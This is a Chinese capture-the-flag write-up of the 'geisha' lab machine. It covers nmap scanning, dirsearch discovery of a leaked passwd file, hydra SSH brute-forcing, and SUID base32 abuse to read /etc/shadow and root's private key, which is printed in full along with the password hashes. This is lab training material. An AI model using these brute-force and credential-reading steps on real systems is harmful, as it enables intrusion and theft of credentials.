美文网首页
1. geisha靶机

1. geisha靶机

作者: 循环不计次 | 来源:发表于2022-10-24 17:46 被阅读0次

    【offensive-security】1.geisha靶机

    typoraimage-20221024164600299.png

    一、获取靶机信息

    1.已知信息:

    • IP: 192.168.214.82

    2.获取信息:

    • nmap扫描开启的服务

      ┌──(lo0p㉿0xlo0p)-[~]
      └─$ sudo nmap 192.168.214.82 -p 1-9999
      Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 17:02 CST
      Nmap scan report for 192.168.214.82
      Host is up (0.20s latency).
      Not shown: 9992 closed tcp ports (reset)
      PORT     STATE SERVICE
      21/tcp   open  ftp
      22/tcp   open  ssh
      80/tcp   open  http
      7080/tcp open  empowerid
      7125/tcp open  unknown
      8088/tcp open  radan-http
      9198/tcp open  unknown
      
      Nmap done: 1 IP address (1 host up) scanned in 22.23 seconds
      

    首先先查看80、7080、7125、8088、9198几个端口,都是同一个web页面,然后扫一下web目录

    • dirsearch爆破web目录
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ dirsearch -u 192.168.214.82:7125
      _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                                            
     (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                            
    Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
    Output File: /home/lo0p/.dirsearch/reports/7125_22-10-24_17-00-31.txt
    Error Log: /home/lo0p/.dirsearch/logs/errors-22-10-24_17-00-31.log
    Target: http://192.168.214.82:7125/
    
    [17:00:31] Starting: 
    [17:01:22] 200 -  175B  - /index.php                                        
    [17:01:22] 200 -  175B  - /index.php/login/                                 
    [17:01:32] 200 -    1KB - /passwd                                           
                                                                                 
    Task Completed
    

    在7125端口提供的服务上发现了passwd文件的泄漏

    • 获取并查看passwd文件
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
    sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
    geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    lsadm:x:998:1001::/:/sbin/nologin
    

    可以发现geisha、root用户具有bash的权限,可以ssh登录

    • ssh爆破root、getsha用户
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.214.82
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-24 17:12:00
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
    [DATA] attacking ssh://192.168.214.82:22/
    [STATUS] 130.00 tries/min, 130 tries in 00:01h, 14344271 to do in 1839:01h, 16 active
    [STATUS] 112.67 tries/min, 338 tries in 00:03h, 14344063 to do in 2121:55h, 16 active
    [22][ssh] host: 192.168.214.82   login: geisha   password: letmein
    1 of 1 target successfully completed, 1 valid password found
    [WARNING] Writing restore file because 3 final worker threads did not complete until end.
    [ERROR] 3 targets did not resolve or could not be connected
    [ERROR] 0 target did not complete
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-24 17:17:13
    

    root爆破失败,但是geisha用户成功了

    • ssh登录geisha用户

    登录成功后,在~目录找到了第一个key文件

    geisha@geisha:~$ ls
    local.txt
    geisha@geisha:~$ cat local.txt 
    4fe47dd40410c975175f78ad08b0060e
    

    还有一个key 盲猜在root用户下,先查看具有SUID权限的文件有哪些

    • 获取SUID权限文件
    geisha@geisha:~$ find / -perm -4000 2>/dev/null #查找具有SUID权限的文件
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/bin/newgrp
    /usr/bin/passwd
    /usr/bin/umount
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/base32
    /usr/bin/sudo
    /usr/bin/fusermount
    /usr/bin/gpasswd
    /usr/bin/chfn
    /usr/bin/mount
    

    此处发现base32可利用(该功能可以对文件进行base32编码,编码后我们解码就可以拿到原文),

    • 获取shadow文件
    geisha@geisha:~/.ssh$ base32 "/etc/shadow" | base32 -d
    root:$6$3haFwrdHJRZKWD./$LYiTApGClgwmFE3TXMRtekWpGOY6fSpnTorsQL/FBr9YdOW4NHMzYFkOLu8qJQVa1wqfEC3a.SZeTHIyEhlPF0:18446:0:99999:7:::
    daemon:*:18385:0:99999:7:::
    bin:*:18385:0:99999:7:::
    sys:*:18385:0:99999:7:::
    sync:*:18385:0:99999:7:::
    games:*:18385:0:99999:7:::
    man:*:18385:0:99999:7:::
    lp:*:18385:0:99999:7:::
    mail:*:18385:0:99999:7:::
    news:*:18385:0:99999:7:::
    uucp:*:18385:0:99999:7:::
    proxy:*:18385:0:99999:7:::
    www-data:*:18385:0:99999:7:::
    backup:*:18385:0:99999:7:::
    list:*:18385:0:99999:7:::
    irc:*:18385:0:99999:7:::
    gnats:*:18385:0:99999:7:::
    nobody:*:18385:0:99999:7:::
    _apt:*:18385:0:99999:7:::
    systemd-timesync:*:18385:0:99999:7:::
    systemd-network:*:18385:0:99999:7:::
    systemd-resolve:*:18385:0:99999:7:::
    messagebus:*:18385:0:99999:7:::
    sshd:*:18385:0:99999:7:::
    geisha:$6$YtDFbbhHHf5Ag5ej$3EjLFKW1aSNBlfAhcyjmY97eLrNtbzDWQ9z5YvSvuA65kH7ZgHR1f9VGFhAEGGqiKAtF8//U45M8QOHouQrWb.:18494:0:99999:7:::
    systemd-coredump:!!:18385::::::
    ftp:*:18391:0:99999:7:::
    

    使用john对root的密码进行爆破

    此处无果。。爆破不出来

    • 尝试获取id_rsa私钥文件
    geisha@geisha:~/.ssh$ base32 "/root/.ssh/id_rsa" | base32 -d
    -----BEGIN RSA PRIVATE KEY-----
    MIIEpQIBAAKCAQEA43eVw/8oSsnOSPCSyhVEnt01fIwy1YZUpEMPQ8pPkwX5uPh4
    OZXrITY3JqYSCFcgJS34/TQkKLp7iG2WGmnno/Op4GchXEdSklwoGOKNA22l7pX5
    89FAL1XSEBCtzlrCrksvfX08+y7tS/I8s41w4aC1TDd5o8c1Kx5lfwl7qw0ZMlbd
    5yeAUhuxuvxo/KFqiUUfpcpoBf3oT2K97/bZr059VU8T4wd5LkCzKEKmK5ebWIB6
    fgIfxyhEm/o3dl1lhegTtzC6PtlhuT7ty//mqEeMuipwH3ln61fHXs72LI/vTx26
    TSSmzHo8zZt+/lwrgroh0ByXbCtDaZjo4HAFfQIDAQABAoIBAQCRXy/b3wpFIcww
    WW+2rvj3/q/cNU2XoQ4fHKx4yqcocz0xtbpAM0veIeQFU0VbBzOID2V9jQE+9k9U
    1ZSEtQJRibwbqk1ryDlBSJxnqwIsGrtdS4Q/CpBWsCZcFgy+QMsC0RI8xPlgHpGR
    Y/LfXZmy2R6E4z9eKEYWlIqRMeJTYgqsP6ZR4SOLuZS1Aq/lq/v9jqGs/SQenjRb
    8zt1BoqCfOp5TtY1NoBLqaPwmDt8+rlQt1IM+2aYmxdUkLFTcMpCGMADggggtnR+
    10pZkA6wM8/FlxyAFcNwt+H3xu5VKuQKdqTfh1EuO3c34UmuS1qnidHO1rYWOhYO
    jceQYzoBAoGBAP/Ml6cp2OWqrheJS9Pgnvz82n+s9yM5raKNnH57j0sbEp++eG7o
    2po5/vrLBcCHGqZ7+RNFXDmRBEMToru/m2RikSVYk8QHLxVZJt5iB3tcxmglGJj/
    cLkGM71JqjHX/edwu2nNu14m4l1JV9LGvvHR5m6uU5cQvdcMTsRpkuxdAoGBAOOl
    THxiQ6R6HkOt9w/WrKDIeGskIXj/P/79aB/2p17M6K+cy75OOYzqkDPENrxK8bub
    RaTzq4Zl2pAqxvsv/CHuJU/xHs9T3Ox7A1hWqnOOk2f0KBmhQTYBs2OKqXXZotHH
    xvkOgc0fqRm1QYlCK2lyBBM14O5Isud1ZZXLUOuhAoGBAIBds1z36xiV5nd5NsxE
    1IQwf5XCvuK2dyQz3Gy8pNQT6eywMM+3mrv6jrJcX66WHhGd9QhurjFVTMY8fFWr
    edeOfzg2kzC0SjR0YMUIfKizjf2FYCqnRXIUYrKC3R3WPlx+fg5CZ9x/tukJfUEQ
    65F+vBye7uPISvw3+O8n68shAoGABXMyppOvrONjkBk9Hfr0vRCvmVkPGBd8T71/
    XayJC0L6myG02wSCajY/Z43eBZoBuY0ZGL7gr2IG3oa3ptHaRnGuIQDTzQDj/CFh
    zh6dDBEwxD9bKmnq5sEZq1tpfTHNrRoMUHAheWi1orDtNb0Izwh0woT6spm49sOf
    v/tTH6ECgYEA/tBeKSVGm0UxGrjpQmhW/9Po62JNz6ZBaTELm3paaxqGtA+0HD0M
    OuzD6TBG6zBF6jW8VLQfiQzIMEUcGa8iJXhI6bemiX6Te1PWC8NMMULhCjObMjCv
    bf+qz0sVYfPb95SQb4vvFjp5XDVdAdtQov7s7XmHyJbZ48r8ISHm98s=
    -----END RSA PRIVATE KEY-----
    

    此处成功获取,我们保存到本地,命名为root_key

    • 使用私钥文件ssh登录root用户并获取第二个flag
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ vim root_key    
                                                                                                                                                                                                                                                
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ chmod 600 root_key                       
                                                                                                                                                                                                                                                
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ ssh -i root_key root@192.168.214.82      
    Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Mon Oct 24 04:31:45 2022 from 192.168.49.214
    root@geisha:~# ls
    flag.txt  proof.txt
    root@geisha:~# cat proof.txt 
    524a212f49a1a7f7f777b6d0b9f44fba
    root@geisha:~#
    

    此处一定要对root_key进行权限划分,否则ssh将不使用这个私钥文件

    相关文章

      网友评论

          本文标题:1. geisha靶机

          本文链接:https://www.haomeiwen.com/subject/iepgzrtx.html